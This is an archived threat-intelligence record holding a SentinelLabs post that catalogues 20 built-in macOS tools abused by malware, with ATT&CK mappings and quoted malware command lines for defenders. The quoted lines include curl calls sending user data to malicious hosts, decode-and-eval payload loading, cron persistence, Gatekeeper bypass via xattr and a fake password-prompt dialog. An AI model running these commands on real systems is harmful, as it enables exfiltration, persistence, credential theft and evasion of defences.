{ "id": "0e2a8913-ee38-4042-93b3-4d185de8ac76", "created_at": "2026-04-06T00:15:18.249247Z", "updated_at": "2026-04-10T03:36:21.953419Z", "deleted_at": null, "sha1_hash": "7978fb2cbb4053499b33682d447b2ea44aa896d8", "title": "20 Common Tools \u0026 Techniques Used by macOS Threat Actors \u0026 Malware - SentinelLabs", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2101257, "plain_text": "20 Common Tools \u0026 Techniques Used by macOS Threat Actors \u0026\r\nMalware - SentinelLabs\r\nBy Phil Stokes\r\nPublished: 2021-02-16 · Archived: 2026-04-02 10:36:59 UTC\r\nIn a recent two-part series of blog posts on Medium, Nasreddine Bencherchali took to exploring some of the\r\ncommon tools and techniques used by threat actors and malware targeting the Windows platform, with a particular\r\nfocus on LOLBins or “Living off the Land binaries”. It’s such an excellent guide for threat hunting and compiling\r\ndetection rules for Windows that we thought: “wouldn’t it be cool to have a similar guide for macOS malware?”\r\nLooking back at campaigns directly targeting the macOS platform for the last several years, we have rounded up\r\n20 of the most commonly used built-in tools (ab)used by threat actors, malware, and adware, complete with in-the-wild examples and associated MITRE behavioral indicators. We’ve also added links for each threat so that you\r\ncan follow up on further details such as IoCs, hashes and researcher analyses.\r\nchmod (/bin/chmod)\r\nChange file modes or Access Control Lists. Generally used by malware in order to give executable permissions to\r\nan executable payload retrieved remotely from a C2.\r\nCommon Arguments\r\nchmod +x\r\nchmod -R 755\r\nchmod 777\r\nITW Examples\r\nBundlore\r\nchmod -R 755 /var/folders/vq/04qz73bd7zb27d3b6r7rc6zr0000gq/T/x.mykHCy73\r\nXCSSET\r\nchmod +x\"xcassets\"\r\nShlayer\r\nchmod 777 /tmp/ZQEifWNV2l\r\nSearchMine.Adware\r\n/bin/chmod +x “${tmpFile}”\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nFile and Directory Permissions Modification T1222\r\nchown (/usr/sbin/chown)\r\nhttps://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/\r\nPage 1 of 14\n\nChange file owner and group. This utility is used by malware to change the user ID and/or the group ID of the\r\nspecified files. This can lock other users’ out of access to the file, thus hampering removal or inspection. It may\r\nalso be required in order to execute a file in certain, elevated context.\r\nCommon Arguments\r\nchown -R \u003cuser[:group]\u003e\r\nITW Examples\r\nOSX.Dummy\r\nchown root /tmp/script.sh\r\nMMInstall\r\n/usr/sbin/chown -R root:wheel /Applications/MyCouponsmart\r\n/usr/sbin/chown -R root:wheel /Users/user/Applications/SecureMacUpdates\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nFile and Directory Permissions Modification T1222\r\ncrontab (/usr/bin/crontab)\r\nList, install and remove rules for the cron daemon. Crontab is commonly leveraged as a means to achieve\r\npersistence on macOS either in addition to or instead of installing agents and daemons via launchctl. Threat actors\r\nmay also enumerate existing crontabs in order to manipulate them.\r\nCommon Arguments\r\ncrontab -l\r\necho '\u003c*/num\u003e * * * * ' | crontab -\r\nITW Examples\r\nEmpyre\r\ncmd = 'crontab -l | { cat; echo \"0 * * * * %s\"; } | crontab -'\r\nGravityRAT\r\nsudo crontab -l 2\u003e/dev/null; echo \"*/2 * * * * s\r\nPupy RAT\r\ncat /etc/passwd | cut -d \":\" -f 1 | xargs -n1 crontab -l -u\r\nVindInstaller\r\ncrontab -l \u003e /tmp/file\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nPersistence TA0003\r\nScheduled Task/Job: Cron T1053\r\ncsrutil (/usr/bin/csrutil)\r\nhttps://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/\r\nPage 2 of 14\n\nRead System Integrity Protection (SIP) status. Introduced in macOS 10.11, this utility has only one publicly\r\ndocumented use, which is to return the status of the System Integrity Protection tool. The csrutil tool is commonly\r\nused by malware and post-exploitation tools to determine whether certain files and directories on the system are\r\nwritable or not.\r\nCommon Arguments\r\ncsrutil status\r\nITW Examples\r\nBella\r\nif systemVersion.startswith(\"10.11\") or systemVersion.startswith(\"10.12\"):\r\n csrutil = subprocess.Popen([\"csrutil status\"], stdout=subprocess.PIPE, shell=True)\r\n (out, err) = csrutil.communicate()\r\nif \"disabled\" in out:\r\nsend_msg(greenPlus + out, False)\r\nsipEnabled = False\r\nMacSearch\r\n/usr/bin/csrutil\r\nOSX.Proton.C\r\ncsrutil status\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nSystem Information Discovery T1082\r\ncurl (/usr/bin/curl)\r\nTransfer data to or from a server without user interaction. One of the most useful tools in the malware author’s\r\ntoolkit, curl is used widely in threats of all kinds, from PUPs and adware to trojans, backdoors, and APT implants,\r\nin order to download payloads, exfiltrate user data, and track campaigns via unique identifiers. Monitoring for\r\nmalicious use of curl is a must for all security teams.\r\nCommon Arguments\r\ncurl -k -s -L -o\r\nITW Examples\r\nOSX.GMERA\r\nreq=`curl -ks \"http://owpqkszz.info/link.php?${whoami}\u0026${ip}\"`\r\nShlayer\r\ncurl -fsL \"$url\" \u003e$tmp_path\r\nBundlore\r\ncurl -s -L -o \"${dir}/stmp.tar.gz\" \"${dlUrl}\"\r\nhttps://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/\r\nPage 3 of 14\n\nOSX.Mami\r\ndo curl -L -f -v --create-dirs -o '/Users/user/Library/Application Support/Cyclonica/Cyclonica'\r\nXCSSET\r\ncurl --connect-timeout 10 -sk https://flixprice.com/agent/log.php\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nCommand and Control TA0011\r\nExfiltration TA0010\r\nExfiltration Over Alternative Protocol T1048\r\ndirname (/usr/bin/dirname)\r\nReturns the filename or directory portion of a pathname. The dirname utility and its companion utility basename\r\nare both used widely by threat actors as a means of constructing installation paths and locating relative assets\r\nbased on the executing parent’s location. Whereas dirname returns the full path to the parent of the current\r\nworking directory, basename returns the name of the current working directory without the preceding path.\r\nCommon Arguments\r\ndirname \u003cpath\u003e\r\nbasename \u003cpath\u003e\r\nITW Examples\r\nXCSSET\r\ndirname /Users/user/Library/LaunchAgents/com.apple.core.accountsd.plist\r\nsh -c basename '/Users/user/Library/Application\r\nScripts/com.apple.AddressBook.Shared/CoreFrameworks/com.oracle.java.sound.app'\r\nOceanLotus\r\ndirname /Users/user/Downloads/ALL tim nha Chi Ngoc Canada.︀doc\r\nMMInstall\r\ndirname /Applications/MyCouponsmart/MyCouponsmart\r\nShlayer\r\nappDir=\"$(dirname $(dirname \"$currentDir\"))\"\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nFile and Directory Discovery T1083\r\nioreg (/usr/sbin/ioreg)\r\nDisplays the I/O Kit registry. This Unix binary is widely used by many malware families to determine the device’s\r\nunique ID (for campaign tracking), usually in the form of the machine’s serial number. This may or may not be\r\nhttps://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/\r\nPage 4 of 14\n\nhashed with another utility (e.g., md5) before being sent to the C2. To facilitate anti-analysis and evasion, ioreg is\r\nalso used by some threat actors to determine whether the device is running in a virtual environment.\r\nCommon Arguments\r\nioreg -c IOPlatformExpertDevice -d 2 | awk -F'\"' '/IOPlatformSerialNumber/{print $(NF-1)}'\r\nITW Examples\r\nOSX.CpuMeaner\r\nioreg -rd1 -w0 -c AppleAHCIDiskDriver | awk '/Serial Number/{gsub(\"\"\", \"\", $4);print $4}'\r\nOSX.Fruitfly\r\nioreg -l | grep -e 'VirtualBox' -e 'Oracle' -e 'VMware' -e 'Parallels' | wc -l\r\nOceanLotus\r\nioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformSerialNumber/ { split($0, line, \"\\\"\");\r\nprintf(\"%s\", line[4]); }'\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nSystem Information Discovery T1082\r\nkill (built-in), pkill (/usr/bin/pkill), killall (/usr/bin/killall)\r\nThese related commands are used to kill processes (kill, pkill) and applications (killall). Typically, malware actors\r\nuse these on macOS for evasion and anti-analysis, such as killing the Activity Monitor or the Terminal to prevent\r\nusers inspecting processes.\r\nCommon Arguments\r\nkillall\r\nkill -9\r\npkill\r\nITW Examples\r\nmacOS.OSAMiner\r\nkillall Terminal\r\nXCSSET\r\nxargs kill -9\r\nBundlore\r\npkill cfprefsd\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nImpair Defenses: Disable or Modify Tools T1562\r\nlaunchctl (/bin/launchctl)\r\nhttps://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/\r\nPage 5 of 14\n\nInterfaces with launchd. For the purposes of malware and threat actors, launchctl is a primary means of executing\r\ncommands and programs, for stopping system or third-party services, and starting newly created persistence jobs\r\ninstalled as Launch Agents and Launch Daemons.\r\nCommon Arguments\r\nlaunchctl load\r\nlaunchctl unload\r\nlaunchctl stop\r\nlaunchctl start\r\nlaunchctl remove\r\nITW Examples\r\nOSX.CoinMiner\r\nlaunchctl load /Library/LaunchDaemons/com.apple.acc.installer.v1.plist\r\nLazarus Family\r\nlaunchctl load -w \"%s/Library/LaunchAgents/%s\"\r\nFinFisher/FinSpy\r\n/bin/launchctl load\r\n/bin/launchctl unload\r\nOSX.Dummy\r\nlaunchctl load -w\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nSystem Services: Launchctl T1569\r\nScheduled Task/Job: Launchd T1053\r\nCreate or Modify System Process: Launch Agent T1543.001\r\nCreate or Modify System Process: Launch Daemon T1543.004\r\nhttps://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/\r\nPage 6 of 14\n\nmktemp (/usr/bin/mktemp)\r\nMake a unique filename. This useful utility is widely used by malware to make random, unique file and directory\r\nnames for payloads. Despite the name, mktemp does not have to be used only in the /tmp directory.\r\nCommon Arguments\r\nmktemp -d\r\nmktemp -t\r\nITW Examples\r\nBundlore\r\ntmpDir=\"$(mktemp -d /tmp/XXXXXXXXXXXX)\r\nTMP_DIR=`mktemp -d -t x\r\nShlayer\r\nexport tmpDir=\"$(mktemp -d /tmp/XXXXXXXXXXXX)\"\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nHide Artifacts T1564\r\nopenssl (/usr/bin/openssl)\r\nCryptography toolkit, openssl is used widely by attackers, often in conjunction with base64, to encode and decode\r\nmalware to hide it from detection.\r\nCommon Arguments\r\nopenssl enc -aes-256-cbc -d -A -base64 -k\r\nITW Examples\r\nEvilOSX\r\nos.popen(\"openssl req -newkey rsa:4096 -nodes -x509 -days 365 -subj \"%s\" -sha256 \"\r\nMMInstall\r\n/bin/sh -c /usr/sbin/ioreg -c IOPlatformExpertDevice -d 2 | awk -F\" '/IOPlatformSerialNumber/{print\r\n$(NF-1)}' | tr -d 'n'| openssl md5\r\nShlayer\r\nopenssl enc -aes-256-cbc -salt -md md5 -d -A -base64 -out /tmp/ZQEifWNV2l -pass\r\n\"pass:0.6effariGgninthgiL0.6\"\r\nZShlayer\r\neval \"$(openssl enc -base64 -d -aes-256-cbc -nosalt -pass pass:10598344576\r\n\u003c\"$fileDir\"/Resources/talon)\"\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nDeobfuscate/Decode Files or Information T1140\r\nhttps://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/\r\nPage 7 of 14\n\nEncrypted Channel: Asymmetric Cryptography T1573\r\nosacompile (/usr/bin/osacompile)\r\nCompile AppleScripts from given files or standard input into a singe output script. Files may be plain text or other\r\ncompiled scripts. Osacompile is useful to malware that wants to take advantage of AppleScript’s many powerful\r\nfeatures such as controlling other applications’ behaviour, manipulating the GUI, faking user input and phishing\r\nfor credentials.\r\nCommon Arguments\r\nosacompile -x -e\r\nosacompile -x -o\r\nITW Examples\r\nXCSSET\r\nosacompile -x -e global dFolder\r\nosacompile -x -o /Users/user/Library/Application\r\nScripts/com.apple.AddressBook.Shared/CoreFrameworks/com.apple.core.okcx.app\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nObfuscated Files or Information: Compile After Delivery T1027\r\nosascript (/usr/bin/osascript)\r\nExecutes a given AppleScript, which may be plain text or a compiled script (.scpt). Scripts can also be specified\r\nline by line using -e switches on the command line, a technique popular among adware and browser\r\nmanipulating malware. Although AppleScripts can be executed in other ways, osascript is still the most common\r\nmethod used by threat actors. It is also a particular favorite of various open source post-exploitation and RAT\r\ntools.\r\nCommon Arguments\r\nosascript -e\r\nITW Examples\r\nEvilOSX\r\nosascript -e 'tell app \"iTunes\" to activate' -e 'tell app \"iTunes\" to display dialog \"Error\r\nconnecting to iTunes. Please verify your password”\r\nPupy RAT\r\ncmd = 'osascript -e 'tell app \"Finder\" to display dialog \"%s\"'' % args.text\r\nEggShell\r\ncmd_data[\"args\"] = \" -e 'tell application \"Finder\" to sleep'\"\r\nElite Keylogger\r\n/usr/bin/osascript\r\nhttps://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/\r\nPage 8 of 14\n\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nCommand and Scripting Interpreter: AppleScript T1059\r\nps (/bin/ps)\r\nDisplay information about running processes. The process status (ps) command is to macOS (and Linux) what\r\nTasklist is to Windows: an adversary’s primary means of understanding the device’s current execution\r\nenvironment. Aside from simply enumerating running processes, ps can be used to check on a given process’\r\nstart time, elapsed time, resource usage and the login name of the user who started it (among other things).\r\nCommon Arguments\r\nps ax\r\nps -p -o etime=\r\nITW Examples\r\nmacOS.OSAMiner\r\nps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print\r\n$1}'\r\nOSX.Fruitfly\r\nps -eAo pid,thcount,ppid,nice,user,command 2\u003e/dev/null\r\nPirrit\r\nif ps -ef | grep -v grep | grep -q $frm; then\r\nBella\r\ncheck_output('ps -p %s -o etime=' % bellaPID)\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nProcess Discovery T1057\r\nsw_vers (/usr/bin/sw_vers)\r\nhttps://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/\r\nPage 9 of 14\n\nPrint operating system version information. It is common for malware to determine the macOS version of the\r\ntarget machine both to discover what APIs are available so that the correct payload can be installed and to\r\nascertain what system defences or mitigations may be in place (e.g., System Integrity Protection, User Data\r\nProtections like Full Disk Access).\r\nCommon Arguments\r\nsw_vers\r\nsw_vers -productName\r\nsw_vers -productVersion\r\nsw_vers -buildVersion\r\nITW Examples\r\nBundlore\r\n/usr/bin/sw_vers -productVersion\r\nGravityRAT\r\nosinfo = os.popen('sw_vers -productName').read().strip() + '-' + os.popen('sw_vers -productVersion')\r\nLazarus/NukeSped\r\nsw_vers -productName\r\nsw_vers -productVersion\r\nsw_vers -buildVersion\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nSystem Information Discovery T1082\r\nsysctl (/usr/sbin/sysctl)\r\nRetrieve kernel state and allow apps with appropriate privileges to set kernel state. Used by malware as a means of\r\ndetermining whether the execution parent is within a sandbox or virtual machine. The utility can also be used to\r\ndetermine, among other things, the amount of installed memory on the infected device.\r\nCommon Arguments\r\nsysctl -n hw.model\r\nITW Examples\r\nBella\r\nsysctl -n machdep.cpu.brand_string; hostinfo | grep memory;\r\nEvilOSX\r\nmodel_key = run_command(\"sysctl -n hw.model\")\r\nGenieo\r\nhttps://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/\r\nPage 10 of 14\n\n/usr/sbin/sysctl\r\nhw.optional.x86_64\r\nhw.cpu64bit_capable\r\nOceanLotus\r\nsysctl hw.model\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nVirtualization/Sandbox Evasion T1497\r\nSystem Information Discovery T1082\r\nsystem_profiler (/usr/sbin/system_profiler)\r\nReports system hardware and software configuration. This built-in utility is a command line version of the System\r\nInformation.app (/Applications/Utilities/System Information.app) and is a mainstay of all types of malware,\r\nspyware, post-exploitation tools, adware, and PUPs. Because of its deep insight into the entire environment, it can\r\nbe used for a variety of purposes relating to environment discovery, detection evasion and anti-analysis.\r\nCommon Arguments\r\nsystem_profiler SPHardwareDataType\r\nsystem_profiler SPUSBDataType\r\nsystem_profiler SPNetworkDataType\r\nITW Examples\r\nBundlore\r\n/usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel full\r\nEmpyre\r\nprocess = subprocess.Popen(\"system_profiler SPHardwareDataType\", stdout=subprocess.PIPE, shell=True)\r\nFinFisher/FinSpy\r\nsystem_profiler SPUSBDataType | egrep -i \"Manufacturer: (parallels|vmware|virtualbox)\"\r\nSearchPageInstaller\r\nsystem_profiler SPNetworkDataType | grep ‘Proxy Enabled’\r\nhttps://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/\r\nPage 11 of 14\n\nAMC.PUA, Genieo\r\n/usr/sbin/system_profiler SPHardwareDataType\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nSystem Information Discovery T1082\r\nVirtualization/Sandbox Evasion T1497\r\ntouch (/usr/bin/touch)\r\nThe touch utility sets the modification and access times of files. If any file does not exist, it is created with default\r\npermissions. This makes the utility useful to malware in two common scenarios: for creating an empty file at a\r\ngiven path that is later passed data, and/or for changing the timestamp on a file as a means of evasion, also known\r\nas “timestomping”.\r\nCommon Arguments\r\ntouch\r\ntouch -t\r\nITW Examples\r\nOceanLotus\r\ntouch -t 1401140507 /Users/user/Library/User Photos/mount_devfs\r\nPirrit\r\ntouch /Applications/.UpdatesMac15\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nIndicator Removal on Host: Timestomp T1070\r\nhttps://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/\r\nPage 12 of 14\n\nMasquerading T1036\r\nwhoami (/usr/bin/whoami)\r\nDisplay effective user id. Although this utility has been replaced by the more versatile id utility, it is still widely\r\nused by malware to retrieve the current user’s name. The whoami command is effectively a synonym for id -un .\r\nCommon Arguments\r\nwhoami\r\nITW Examples\r\nEggShell\r\necho '%@' | sudo -S whoami\r\nwhoami\r\nLazarus\r\nwhoami\r\nPupy RAT\r\nusername=`whoami`\r\nOSX.GMERA\r\nwhoami=\"$(remove_spec_char `whoami`)\"\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nSystem Owner/User Discovery T1033\r\nxattr (/usr/bin/xattr)\r\nhttps://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/\r\nPage 13 of 14\n\nDisplay and manipulate extended attributes. Used by malware and threat actors as a means to bypass Gatekeeper\r\nand Notarization checks on macOS. Incredibly, any process or user can remove the file attribute that is required\r\nfor these checks to proceed without admin rights.\r\nCommon Arguments\r\nxattr -d com.apple.quarantine\r\nxattr -c\r\nxattr -cr\r\nITW Examples\r\nOceanLotus\r\nfind /Users/user -name *ALL tim nha Chi Ngoc Canada* -exec xattr -d com.apple.quarantine {} +\r\nXCSSET\r\n/bin/bash -c xattr -cr '/Applications/Google Chrome.app'\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nBypass or Subvert Trust Controls T1553\r\nConclusion\r\nMany threat actors and malware samples use the same tools on macOS, so monitoring or searching for anomalous\r\nuse of these tools can help your incident response, threat hunting and blue team efforts. For more in-depth\r\ninformation on macOS threat hunting, grab the free SentinelLabs Guide to macOS Threat Hunting \u0026 Incident\r\nResponse ebook.\r\nSource: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/\r\nhttps://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/\r\nPage 14 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/" ], "report_names": [ "20-common-tools-techniques-used-by-macos-threat-actors-malware" ], "threat_actors": [ { "id": "af509bbb-8d18-4903-a9bd-9e94099c6b30", "created_at": "2023-01-06T13:46:38.585525Z", "updated_at": "2026-04-10T02:00:03.030833Z", "deleted_at": null, "main_name": "APT32", "aliases": [ "OceanLotus", "ATK17", "G0050", "APT-C-00", "APT-32", "Canvas Cyclone", "SeaLotus", "Ocean Buffalo", "OceanLotus Group", "Cobalt Kitty", "Sea Lotus", "APT 32", "POND LOACH", "TIN WOODLAWN", "Ocean Lotus" ], "source_name": "MISPGALAXY:APT32", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null }, { "id": "870f6f62-84f5-48ca-a18e-cf2902cd6924", "created_at": "2022-10-25T15:50:23.303818Z", "updated_at": "2026-04-10T02:00:05.301184Z", "deleted_at": null, "main_name": "APT32", "aliases": [ "APT32", "SeaLotus", "OceanLotus", "APT-C-00", "Canvas Cyclone" ], "source_name": "MITRE:APT32", "tools": [ "Mimikatz", "ipconfig", "Kerrdown", "Cobalt Strike", "SOUNDBITE", "OSX_OCEANLOTUS.D", "KOMPROGO", "netsh", "RotaJakiro", "PHOREAL", "Arp", "Denis", "Goopy" ], "source_id": "MITRE", "reports": null }, { "id": "5da6b5fd-1955-412a-81aa-069fb50b6e31", "created_at": "2025-08-07T02:03:25.116085Z", "updated_at": "2026-04-10T02:00:03.668978Z", "deleted_at": null, "main_name": "TIN WOODLAWN", "aliases": [ "APT32 ", "Cobalt Kitty", "OceanLotus", "WOODLAWN " ], "source_name": "Secureworks:TIN WOODLAWN", "tools": [ "Cobalt Strike", "Denis", "Goopy", "JEShell", "KerrDown", "Mimikatz", "Ratsnif", "Remy", "Rizzo", "RolandRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "2439ad53-39cc-4fff-8fdf-4028d65803c0", "created_at": "2022-10-25T16:07:23.353204Z", "updated_at": "2026-04-10T02:00:04.55407Z", "deleted_at": null, "main_name": "APT 32", "aliases": [ "APT 32", "APT-C-00", "APT-LY-100", "ATK 17", "G0050", "Lotus Bane", "Ocean Buffalo", "OceanLotus", "Operation Cobalt Kitty", "Operation PhantomLance", "Pond Loach", "SeaLotus", "SectorF01", "Tin Woodlawn" ], "source_name": "ETDA:APT 32", "tools": [ "Agentemis", "Android.Backdoor.736.origin", "AtNow", "Backdoor.MacOS.OCEANLOTUS.F", "BadCake", "CACTUSTORCH", "CamCapture Plugin", "CinaRAT", "Cobalt Strike", "CobaltStrike", "Cuegoe", "DKMC", "Denis", "Goopy", "HiddenLotus", "KOMPROGO", "KerrDown", "METALJACK", "MSFvenom", "Mimikatz", "Nishang", "OSX_OCEANLOTUS.D", "OceanLotus", "PHOREAL", "PWNDROID1", "PhantomLance", "PowerSploit", "Quasar RAT", "QuasarRAT", "RatSnif", "Remy", "Remy RAT", "Rizzo", "Roland", "Roland RAT", "SOUNDBITE", "Salgorea", "Splinter RAT", "Terracotta VPN", "Yggdrasil", "cobeacon", "denesRAT", "fingerprintjs2" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434518, "ts_updated_at": 1775792181, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/7978fb2cbb4053499b33682d447b2ea44aa896d8.pdf", "text": "https://archive.orkl.eu/7978fb2cbb4053499b33682d447b2ea44aa896d8.txt", "img": "https://archive.orkl.eu/7978fb2cbb4053499b33682d447b2ea44aa896d8.jpg" } }